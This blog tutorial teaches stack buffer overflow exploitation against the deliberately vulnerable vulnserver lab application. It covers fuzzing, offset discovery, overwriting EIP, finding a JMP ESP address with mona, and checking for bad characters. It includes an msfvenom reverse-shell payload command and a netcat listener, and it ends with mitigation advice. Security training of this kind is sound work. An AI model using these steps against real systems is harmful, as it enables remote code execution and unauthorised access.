In this blog, we will be discussing the basics of exploit development by exploiting a stack overflow vulnerability in a simple application. We will look at a simple memory structure, program execution in memory, causes of buffer overflow and then finally, as always, a practical demonstration of the attack.
What is Buffer Overflow?
Buffer overflow is simply overflowing the buffer space that a program or application has been allocated in the memory.
Stack Memory Structure:
The memory stack is a part in the memory assigned to an application or program for its execution. It is responsible for holding the local data, parametric values and return addresses during the execution of the application or program. It follows the Last In, First Out (LIFO) method of memory storage, i.e. the instruction last stored (PUSH) on the stack gets executed first (POP).
The stack is composed of four main components: the ESP (Extended Stack Pointer), the EBP (Extended Base Pointer), the EIP (Extended Instruction Pointer) and the Buffer Space. The diagrammatic layout of a memory stack is shown below:
Now let us take a brief look at each of these four components:
- Extended Stack Pointer (or the ESP): ESP is the CPU register that holds the memory address of the instruction being executed at top of the stack. The value in the ESP changes as the program execution follows.
- Buffer Space: It is the space that is allocated to the program for its execution. Generally, the information in the buffer should not be allowed to escape the buffer space. This is done by implementing proper input sanitizations and following a secure coding approach.
- Extended Base Pointer (or the EBP): EBP is the CPU register that holds the memory address of the top of the stack. This generally remains fixed during the entire program execution and is used as a reference address for the next instructions.
- Extended Instruction Pointer (or the EIP): EIP controls the flow of execution. It holds the location of the next instruction to be executed by the CPU. EIP is the main target of the buffer overflow attack, as controlling the EIP gives the attacker the control of command execution.
When an application or program is loaded into the memory for execution, it makes up space in the memory and is allocated a stack. The EBP holds the address of this stack frame. As the program starts its execution, the ESP gets updated with the instructions that are being executed on the top of the stack (referenced by the EBP), while the EIP updates itself with the next instruction to be executed according to the application logic. All the arguments and parametric values that the program may require are stored in the buffer space.
Causes of Buffer Overflow:
When the buffer space fails to handle the data in the buffer space efficiently; i.e. the data is the buffer space exceeds the allocated buffer space, the buffer may overflow causing the adjacent memory locations to be written by the data. Lack of input sanitization in the application code, may leave the application vulnerable to a buffer overflow vulnerability.
Anatomy of a Buffer Overflow Attack:
Let us assume we have a simple application that asks the user for its name. In the application code, the buffer space allocated for the name is an array of 8 characters. As the application starts its execution, it asks the user for its name. Let us suppose the user’s name is Anthony, he enters his name, the application accepts it and since ‘Anthony’ is within the 8-character limit of the buffer, the application exits out fine. But let’s say the user enters his full name; i.e. ‘Anthony Martial’ this is well outside the limit of the buffer space, if proper input sanitization is not present, the application will accept the name, fill the buffer space with ‘Anthony ‘ and ‘Martial’ will be written onto the adjacent memory locations. The application will then look for the next instruction to execute but will find ‘Martial’ as the next instruction to be executed, which is an invalid instruction, the application will crash.
Now, an attacker can leverage this behavior to his advantage by determining how many bytes are required by the application to function properly, he’ll figure out the exact number of bytes that crashes the application, supplies valid input as the max length that the application can handle and then place his payloaded shellcode as assembly instruction onto the next memory locations. When the application moves on to the next memory location, it will find the attacker’s shellcode and eventually the attacker can direct the flow of execution as per his needs.
Lab Setup: For demonstration purposes, we’ll be using the determinedly vulnerable built application, vulnserver. It is a command-line windows application, so our victim or the target OS will be a Windows machine, which we will be attacking using our Kali Linux machine. The ultimate goal of the attack is to gain access to the Windows machine. For debugging purposes, and looking at the registers and memory, we’ll be using Immunity Debugger. For shellcode generation we will use msfvenom, and netcat as the listener.
The entire attack is based upon the following steps:
- Fuzzing the application to determine the crashing of the application
- Finding the exact location of the crash (called the Offset)
- Confirming the offset, and control over the flow of execution by Overwriting the Instruction Pointer (EIP)
- Checking for bad characters
- Finding the application library with no memory protections
- And finally, gaining access to the target
To save time, we will not be spiking the application to see which input command is vulnerable to the attack, instead we will start from fuzzing because we know that the ‘TRUN’ command is vulnerable.
Running Immunity Debugger as administrator and attaching vulnserver in Immunity Debugger, and then pressing the play button, to allow vulnserver start accepting connections.
Fuzzing the Vulnserver:
We fuzz the vulnserver by sending a large number of the letter ‘A’ in incremental order. After some time, we find in Immunity Debugger that the application has crashed.
When we look at our fuzzing script, we find that our application crashed at 2400 bytes.
Locating the Offset:
Restarting vulnserver from within Immunity, now we generate a random pattern of 2500 bytes of never repeating characters. For this purpose, we use the pattern_create ruby script.
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2500
We then send this random pattern over to vulnserver, and after the crash we look at the value of EIP.
We then query this string using the pattern_offset script to find the exact number of bytes used to crash the application. We find that our offset is located at 2003 bytes.
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <string_in_the_EIP>
Confirming the Offset by Overwriting the EIP:
We now send 2003 A’s and 4 B’s over to vulnserver and see whether our offset is correct and whether we can overwrite the EIP or not.
Locating the Application Module with no Memory Protections:
Now we must look for a module within the application that does not have any memory protections. For this purpose we’ll use a python script mona, and load up mona within Immunity Debugger.
$ !mona modules
The first highlighted module, which is a dll, has all memory protections disabled.
Now we must check whether we can use this module to our advantage. For this purpose, we must check whether the JMP ESP instruction is in the dll or not.
First, we determine the operation-code (or opcode or hex-equivalent) of JMP ESP. we will use nasm_shell for this purpose.
$ inside the nasm_shell prompt, type in JMP ESP and then press enter
So, the opcode for JMP ESP is FFE4.
Let us search the application module for this opcode, and we find the instruction address for JMP ESP within this DLL.
$ !mona find -s “\xff\xe4” -m essfunc.dll
Now, the question here arises what is ‘JMP ESP’ and why do we use it. Putting it simply, ‘JMP ESP’ means ‘Jump to the ESP register.’ We will place our shellcode on top of our stack frame, for that reason we need the memory address of JMP ESP. We’ll inject this return address into the EIP, and as vulnserver starts its execution, after overflowing the buffer space, it’ll look into the EIP for the next instruction, where it will find the JMP ESP opcode, so it’ll jump back to the ESP, where it will find our shellcode, execute the code and give us command execution into the system.
Next, we will verify whether we are controlling the program execution or not. For this, we’ll put our JMP ESP return address into the EIP (in Little Endian format, as the application is designed on a 32-bit architecture), and will then check that upon execution of the application if the EIP points to the JMP ESP or not.
First let us search for this JMP ESP opcode in Immunity, and then place a breakpoint on that instruction.
So that when the execution flow reaches the break point, the program will pause, and we can check whether we are controlling the execution flow or not. As seen in the screenshot below, we find the return address of the JMP ESP instruction written in the EIP, meaning that now we have full control of the execution flow.
Figuring out Bad Characters:
Since now we know that we control the EIP. Before we generate our shellcode, we need to find what bad characters might create problems in the execution of our shellcode, because the application will not process those characters. Generally, the null byte (\x00), the line feed (\x0A) and the carriage return (\x0D) are bad characters.
We find bad characters by using this list of characters in hex by SecLists and after sending them to vulnserver, we follow the ESP in memory stream and then look for characters that do not follow the pattern or stand-out unique from the ongoing pattern.
Luckily, no bad characters are found within the application.
Generating Shellcode and Gaining Access:
Now that we have our EIP return address that will point to our shellcode, and the list of bad characters; it is time to generate our shellcode and exploit the application.
We will generate our shellcode using msfvenom.
$ msfvenom -p windows/shell_reverse_tcp LHOST=<attacking_machine_ip> LPORT=<attacking_machine_listening_port> EXITFUNC=thread -a x86 -b ‘\x00\x0A\x0D’ -f c
We use exit function as thread, so that our shellcode creates the process in a new thread, and upon exiting the shell, the application does not break. Time to send over our shellcode and gain access to the target. After making necessary changes to our script, we set up a listener and fire away the shellcode.
$ nc -lvnp 1337
And as soon as the script runs, we get a session of the target on our attacking machine.
Defense & Mitigation
- Implement secure coding practices when developing and building applications, by using secure programming functions.
- Apply proper input validations and sanitizations.
- Implement memory protections like Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP), Structured Exception Handling (SEH).